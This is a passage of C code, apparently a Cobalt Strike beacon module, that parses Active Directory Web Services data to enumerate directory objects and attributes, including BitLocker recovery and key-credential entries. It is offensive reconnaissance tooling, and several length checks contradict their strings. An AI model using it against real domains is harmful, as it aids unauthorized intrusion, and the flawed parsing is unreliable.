                    else if (attrName[j] != '-' && attrName[j] != '_' && !(attrName[j] >= '0' && attrName[j] <= '9'))
                    {
                        isValid = FALSE;
                        break;
                    }
                }

                // Skip metadata strings
                if (isValid && hasAlpha)
                {
                    for (int m = 0; skipMetadata[m] != NULL; m++)
                    {
                        if (MSVCRT$_stricmp(attrName, skipMetadata[m]) == 0)
                        {
                            isValid = FALSE;
                            break;
                        }
                    }
                }

                if (isValid && hasAlpha)
                {
                    BOOL isDuplicate = FALSE;
                    for (DWORD j = 0; j < attrCount; j++)
                    {
                        if (MSVCRT$_stricmp(attributeNames[j], attrName) == 0)
                        {
                            isDuplicate = TRUE;
                            break;
                        }
                    }

                    if (!isDuplicate && attrCount < maxAttrs)
                    {
                        MSVCRT$strcpy(attributeNames[attrCount], attrName);
                        attrCount++;
                    }
                }
            }
        }

        // Also look for direct attribute patterns (filtered responses)
        // Pattern: <attrLen> <attributeName> followed by specific markers
        if (i > 0 && data[i - 1] > 0 && data[i - 1] < 64)
        {
            BYTE possibleAttrLen = data[i - 1];
            if (i + possibleAttrLen + 1 < end)
            {
                // Check if followed by known markers
                BYTE followingByte = data[i + possibleAttrLen];
                if (followingByte == 0x04 || followingByte == 0x41 || followingByte == 0x05 || followingByte == 0x98 ||
                    (followingByte >= 0x80 && followingByte <= 0x86))
                {

                    // Extract potential attribute name
                    char attrName[64];
                    BOOL isValid = TRUE;
                    BOOL hasAlpha = FALSE;

                    // Must start at valid position and contain valid chars
                    if (i + possibleAttrLen > end)
                    {
                        continue;
                    }

                    for (BYTE j = 0; j < possibleAttrLen; j++)
                    {
                        attrName[j] = data[i + j];
                        if ((attrName[j] >= 'a' && attrName[j] <= 'z') || (attrName[j] >= 'A' && attrName[j] <= 'Z'))
                        {
                            hasAlpha = TRUE;
                        }
                        else if (attrName[j] != '-' && attrName[j] != '_' &&
                                 !(attrName[j] >= '0' && attrName[j] <= '9'))
                        {
                            isValid = FALSE;
                            break;
                        }
                    }
                    attrName[possibleAttrLen] = '\0';

                    if (isValid && hasAlpha && MSVCRT$strlen(attrName) > 2)
                    {
                        // Skip metadata strings
                        for (int m = 0; skipMetadata[m] != NULL; m++)
                        {
                            if (MSVCRT$_stricmp(attrName, skipMetadata[m]) == 0)
                            {
                                isValid = FALSE;
                                break;
                            }
                        }

                        if (isValid)
                        {
                            // Check if we already have this attribute
                            BOOL isDuplicate = FALSE;
                            for (DWORD j = 0; j < attrCount; j++)
                            {
                                if (MSVCRT$_stricmp(attributeNames[j], attrName) == 0)
                                {
                                    isDuplicate = TRUE;
                                    break;
                                }
                            }

                            if (!isDuplicate)
                            {
                                MSVCRT$strcpy(attributeNames[attrCount], attrName);
                                attrCount++;
                            }
                        }
                    }
                }
            }
        }
    }

    // Also check for direct attribute patterns (length-prefixed)
    for (DWORD i = start + 1; i < end - 5 && attrCount < maxAttrs; i++)
    {
        BYTE possibleLen = data[i - 1];
        if (possibleLen > 0 && possibleLen < 64 && i + possibleLen + 2 < end)
        {
            if (data[i + possibleLen] == 0x04 || data[i + possibleLen] == 0x41 || data[i + possibleLen] == 0x05 ||
                (data[i + possibleLen] == 0x98 && data[i + possibleLen + 1] == 0x0A) ||
                (data[i + possibleLen] >= 0x80 && data[i + possibleLen] <= 0x86))
            {

                char attrName[64];
                MSVCRT$memcpy(attrName, data + i, possibleLen);
                attrName[possibleLen] = '\0';

                BOOL isValid = TRUE;
                BOOL hasAlpha = FALSE;
                for (BYTE j = 0; j < possibleLen; j++)
                {
                    if ((attrName[j] >= 'a' && attrName[j] <= 'z') || (attrName[j] >= 'A' && attrName[j] <= 'Z'))
                    {
                        hasAlpha = TRUE;
                    }
                    else if (attrName[j] != '-' && attrName[j] != '_' && !(attrName[j] >= '0' && attrName[j] <= '9'))
                    {
                        isValid = FALSE;
                        break;
                    }
                }

                if (isValid && hasAlpha)
                {
                    for (int m = 0; skipMetadata[m] != NULL; m++)
                    {
                        if (MSVCRT$_stricmp(attrName, skipMetadata[m]) == 0)
                        {
                            isValid = FALSE;
                            break;
                        }
                    }

                    if (isValid)
                    {
                        BOOL isDuplicate = FALSE;
                        for (DWORD j = 0; j < attrCount; j++)
                        {
                            if (MSVCRT$_stricmp(attributeNames[j], attrName) == 0)
                            {
                                isDuplicate = TRUE;
                                break;
                            }
                        }

                        if (!isDuplicate && attrCount < maxAttrs)
                        {
                            MSVCRT$strcpy(attributeNames[attrCount], attrName);
                            attrCount++;
                        }
                    }
                }
            }
        }
    }

    return attrCount;
}

DWORD DiscoverAttributesInObject(BYTE *data, DWORD start, DWORD end, ATTRIBUTE_ENTRY *attrs, DWORD maxAttrs)
{
    DWORD attrCount = 0;

    char (*attributeNames)[64] = (char (*)[64])intAlloc(200 * 64);
    if (!attributeNames)
    {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate memory for attribute names");
        return 0;
    }

    // Discover from object boundaries
    DWORD nameCount = DiscoverAttributeNames(data, start, end, attributeNames, 200);

    // Extract value for each discovered attribute
    for (DWORD i = 0; i < nameCount && attrCount < maxAttrs; i++)
    {
        if (attrCount >= maxAttrs)
            break;

        // Clear the entry first - ensure full initialization
        MSVCRT$memset(&attrs[attrCount], 0, sizeof(ATTRIBUTE_ENTRY));

        // Copy the attribute name
        MSVCRT$strcpy(attrs[attrCount].name, attributeNames[i]);

        // Use universal extractor to get the value - search within object boundaries
        if (data && start < end && attributeNames[i][0] != '\0')
        {
            if (ExtractAttributeUniversal(data + start, end - start, attributeNames[i], attrs[attrCount].value,
                                          sizeof(attrs[attrCount].value)))
            {
                attrCount++;
            }
        }
    }

    intFree(attributeNames);
    return attrCount;
}

// First tries explicit type markers (addata:user, addata:computer, etc.)
// Falls back to DN-based detection for objects without type markers (like trustedDomain)
DWORD FindObjectBoundaries(BYTE *data, DWORD dataLen, OBJECT_BOUNDARY *boundaries, DWORD maxBoundaries)
{
    DWORD boundaryCount = 0;
    DWORD *objectStarts = (DWORD *)intAlloc(5000 * sizeof(DWORD));
    if (!objectStarts)
        return 0;
    DWORD objectStartCount = 0;

    for (DWORD i = 0; i < dataLen - 20; i++)
    {
        if (i + 6 < dataLen && MSVCRT$memcmp(data + i, "addata", 6) == 0)
        {
            BYTE lenByte = data[i + 6];

            if (lenByte == 0x04 && i + 11 < dataLen && MSVCRT$memcmp(data + i + 7, "user", 4) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x08 && i + 15 < dataLen && MSVCRT$memcmp(data + i + 7, "computer", 8) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x05 && i + 12 < dataLen && MSVCRT$memcmp(data + i + 7, "group", 5) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "domain", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "domainDNS", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "container", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x12 && i + 25 < dataLen && MSVCRT$memcmp(data + i + 7, "organizationalUnit", 18) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x07 && i + 14 < dataLen && MSVCRT$memcmp(data + i + 7, "dnsNode", 7) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x18 && i + 31 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "foreignSecurityPrincipal", 24) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "groupPolicyContainer", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "msImaging", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0C && i + 19 < dataLen && MSVCRT$memcmp(data + i + 7, "lostAndFound", 12) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "infrastructureUpdate", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "builtinDomain", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "trustedDomain", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0C && i + 19 < dataLen && MSVCRT$memcmp(data + i + 7, "rpcContainer", 12) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x07 && i + 14 < dataLen && MSVCRT$memcmp(data + i + 7, "dnsZone", 7) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x07 && i + 14 < dataLen && MSVCRT$memcmp(data + i + 7, "dnsNode", 7) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "samServer", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0A && i + 17 < dataLen && MSVCRT$memcmp(data + i + 7, "rIDManager", 10) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "rIDSet", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x10 && i + 23 < dataLen && MSVCRT$memcmp(data + i + 7, "fileLinkTracking", 16) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x18 && i + 31 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "linkTrackObjectMoveTable", 24) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0C && i + 19 < dataLen && MSVCRT$memcmp(data + i + 7, "domainPolicy", 12) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0A && i + 17 < dataLen && MSVCRT$memcmp(data + i + 7, "classStore", 10) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "infrastructureUpdate", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "nTFRSSettings", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDFSR-LocalSettings", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x11 && i + 24 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-Subscriber", 17) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-Subscription", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x15 && i + 28 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDFSR-GlobalSettings", 21) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x17 && i + 30 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDFSR-ReplicationGroup", 23) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-Content", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x11 && i + 24 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-ContentSet", 17) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0F && i + 22 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-Topology", 15) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "msDFSR-Member", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x10 && i + 23 < dataLen && MSVCRT$memcmp(data + i + 7, "dfsConfiguration", 16) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "msImaging-PSPs", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x07 && i + 14 < dataLen && MSVCRT$memcmp(data + i + 7, "contact", 7) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x20 && i + 39 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-GroupManagedServiceAccount", 32) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x1B && i + 34 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-ManagedServiceAccount", 27) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0B && i + 18 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-Device", 11) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x15 && i + 28 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-PasswordSettings", 21) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x04 && i + 11 < dataLen && MSVCRT$memcmp(data + i + 7, "site", 4) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "subnet", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x08 && i + 15 < dataLen && MSVCRT$memcmp(data + i + 7, "siteLink", 8) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "siteLinkBridge", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x07 && i + 14 < dataLen && MSVCRT$memcmp(data + i + 7, "nTDSDSA", 7) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "server", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "nTDSConnection", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "pKIEnrollmentService", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x16 && i + 29 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "pKICertificateTemplate", 22) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x16 && i + 29 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "certificationAuthority", 22) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "cRLDistributionPoint", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "pKIKeyRecoveryAgent", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x08 && i + 15 < dataLen && MSVCRT$memcmp(data + i + 7, "crossRef", 8) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0B && i + 18 < dataLen && MSVCRT$memcmp(data + i + 7, "queryPolicy", 11) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-QuotaContainer", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x11 && i + 24 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-QuotaControl", 17) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0B && i + 18 < dataLen && MSVCRT$memcmp(data + i + 7, "classSchema", 11) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0F && i + 22 < dataLen && MSVCRT$memcmp(data + i + 7, "attributeSchema", 15) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "subSchema", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x16 && i + 29 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "serviceConnectionPoint", 22) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x11 && i + 24 < dataLen && MSVCRT$memcmp(data + i + 7, "msSFU30DomainInfo", 17) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0A && i + 17 < dataLen && MSVCRT$memcmp(data + i + 7, "printQueue", 10) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "volume", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0F && i + 22 < dataLen && MSVCRT$memcmp(data + i + 7, "connectionPoint", 15) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "dynamicObject", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "inetOrgPerson", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-ClaimType", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x15 && i + 28 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-ResourceProperty", 21) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x18 && i + 31 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-CentralAccessPolicy", 24) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x10 && i + 23 < dataLen && MSVCRT$memcmp(data + i + 7, "nTDSSiteSettings", 16) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x09 && i + 16 < dataLen && MSVCRT$memcmp(data + i + 7, "samDomain", 9) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-AzAdminManager", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "msExchSystemMailbox", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x12 && i + 25 < dataLen && MSVCRT$memcmp(data + i + 7, "msExchPublicFolder", 18) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x1E && i + 37 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msExchDynamicDistributionList", 30) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x14 && i + 27 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "organizationalPerson", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x06 && i + 13 < dataLen && MSVCRT$memcmp(data + i + 7, "person", 6) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x1E && i + 37 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msTPM-TpmInformationForComputer", 31) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x1B && i + 34 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msFVE-RecoveryInformation", 25) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-KeyCredentialLink", 22) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x16 && i + 29 < dataLen &&
                     MSVCRT$memcmp(data + i + 7, "msDS-AuthNPolicySilo", 20) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x1A && i + 33 < dataLen && MSVCRT$memcmp(data + i + 7, "msDS-AuthNPolicy", 16) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0B && i + 18 < dataLen && MSVCRT$memcmp(data + i + 7, "printServer", 11) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0D && i + 20 < dataLen && MSVCRT$memcmp(data + i + 7, "configuration", 13) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x10 && i + 23 < dataLen && MSVCRT$memcmp(data + i + 7, "displaySpecifier", 16) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x12 && i + 25 < dataLen && MSVCRT$memcmp(data + i + 7, "interSiteTransport", 18) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "applicationSettings", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x13 && i + 26 < dataLen && MSVCRT$memcmp(data + i + 7, "packageRegistration", 19) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x03 && i + 10 < dataLen && MSVCRT$memcmp(data + i + 7, "top", 3) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x0E && i + 21 < dataLen && MSVCRT$memcmp(data + i + 7, "securityObject", 14) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
            else if (lenByte == 0x11 && i + 24 < dataLen && MSVCRT$memcmp(data + i + 7, "applicationEntity", 17) == 0)
            {
                if (objectStartCount < 5000)
                {
                    objectStarts[objectStartCount++] = i;
                }
            }
        }
    }

    if (objectStartCount == 0)
    {
        typedef struct
        {
            DWORD offset;
            char dn[256];
            BOOL isObjectDN;
        } DNInfo;

        DNInfo *dnInfos = (DNInfo *)intAlloc(sizeof(DNInfo) * 5000);
        if (!dnInfos)
        {
            intFree(objectStarts);
            return 0;
        }
        DWORD dnCount = 0;

        for (DWORD i = 0; i < dataLen - 20; i++)
        {
            if ((data[i] == 0x98 || data[i] == 0x99) && i + 1 < dataLen)
            {
                BYTE textLen = data[i + 1];
                if (textLen > 10 && textLen < 250 && i + 2 + textLen <= dataLen)
                {
                    char textValue[256];
                    MSVCRT$memcpy(textValue, data + i + 2, textLen);
                    textValue[textLen] = '\0';

                    // Check if this could be a DN
                    if ((MSVCRT$strstr(textValue, "CN=") || MSVCRT$strstr(textValue, "cn=")) ||
                        (MSVCRT$strstr(textValue, "DC=") || MSVCRT$strstr(textValue, "dc=")) ||
                        (MSVCRT$strstr(textValue, "OU=") || MSVCRT$strstr(textValue, "ou=")))
                    {

                        BOOL isDN = FALSE;
                        DWORD dnAttrOffset = 0;
                        for (DWORD k = (i > 200) ? i - 200 : 0; k < i; k++)
                        {
                            if (k + 17 < i && MSVCRT$memcmp(data + k, "distinguishedName", 17) == 0)
                            {
                                BOOL hasIntermediateDN = FALSE;
                                for (DWORD m = k + 17; m < i; m++)
                                {
                                    if ((data[m] == 0x98 || data[m] == 0x99) && m + 1 < dataLen)
                                    {
                                        BYTE len = data[m + 1];
                                        if (len > 10 && len < 200 && m + 2 + len <= dataLen)
                                        {
                                            char val[256];
                                            MSVCRT$memcpy(val, data + m + 2, len);
                                            val[len] = '\0';
                                            if (MSVCRT$strstr(val, "DC=") || MSVCRT$strstr(val, "CN=") ||
                                                MSVCRT$strstr(val, "OU="))
                                            {
                                                hasIntermediateDN = TRUE;
                                                break;
                                            }
                                        }
                                    }
                                }
                                if (!hasIntermediateDN)
                                {
                                    isDN = TRUE;
                                    dnAttrOffset = k;
                                    break;
                                }
                            }
                        }

                        if (isDN && dnCount < 5000)
                        {
                            BOOL isDuplicate = FALSE;
                            for (DWORD j = 0; j < dnCount; j++)
                            {
                                if (MSVCRT$strcmp(dnInfos[j].dn, textValue) == 0)
                                {
                                    isDuplicate = TRUE;
                                    break;
                                }
                            }

                            if (!isDuplicate)
                            {
                                dnInfos[dnCount].offset = i;
                                MSVCRT$strcpy(dnInfos[dnCount].dn, textValue);
                                dnInfos[dnCount].isObjectDN = TRUE;
                                dnCount++;
                            }
                        }
                    }
                }
            }
        }

        for (DWORD i = 0; i < dnCount; i++)
        {
            if (dnInfos[i].isObjectDN && objectStartCount < 5000)
            {
                DWORD objectStart = dnInfos[i].offset;

